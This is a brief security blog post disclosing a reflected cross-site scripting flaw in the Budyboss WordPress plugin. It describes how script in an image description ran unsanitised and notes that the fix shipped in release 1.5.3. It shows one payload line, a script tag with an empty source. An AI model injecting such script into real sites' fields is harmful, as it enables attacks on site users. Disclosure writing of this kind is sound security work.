Posts F[0x05] Reflected XSS in Wordpress plugin - Budyboss

F[0x05] Reflected XSS in Wordpress plugin - Budyboss

[Backdated Post]Date of finding: 30/09/2020 Actual date of publication: 25/10/2020[Backdated Post]

In this post I will describe a (small) vulnerability I discovered when testing the security of a platform for a non-profit.

The platform in question was Budyboss. Budyboss serves as an all-in-one plugin for Wordpress to ‘Sell memberships, courses, and build online communities’. In essence, Budyboss is a collection of plugins with high-interoperability.

They pride themselves on their security, so I wasn’t expecting to find much. The fact that I was only able to find a reflected XSS vulnerability in the few hours that I poked around assures me their pride is at least somewhat justified.

The Finding

As described in this issue, the vulnerability can be triggered by entering javascript as part of the description of an image. This description together with any included remotely sourced javascript will replace the previous description without proper sanitation, allowing the javascript to run.

<script src= >

It is not a stored XSS vulnerability, since the description is properly sanitized before it is stored in the database. And so, upon refreshing the page, the description will be sanitized. All other visitors also only get to see the sanitized version of the description, greatly limiting the impact of this vulnerability.


Sanitizing the description before displaying it to the user remediates this vulnerability, as is showcased in the applied fix.

This fix was part of the 1.5.3 Budyboss release.

This post is licensed under CC BY 4.0 by the author.
Hell is empty and all the devils are here.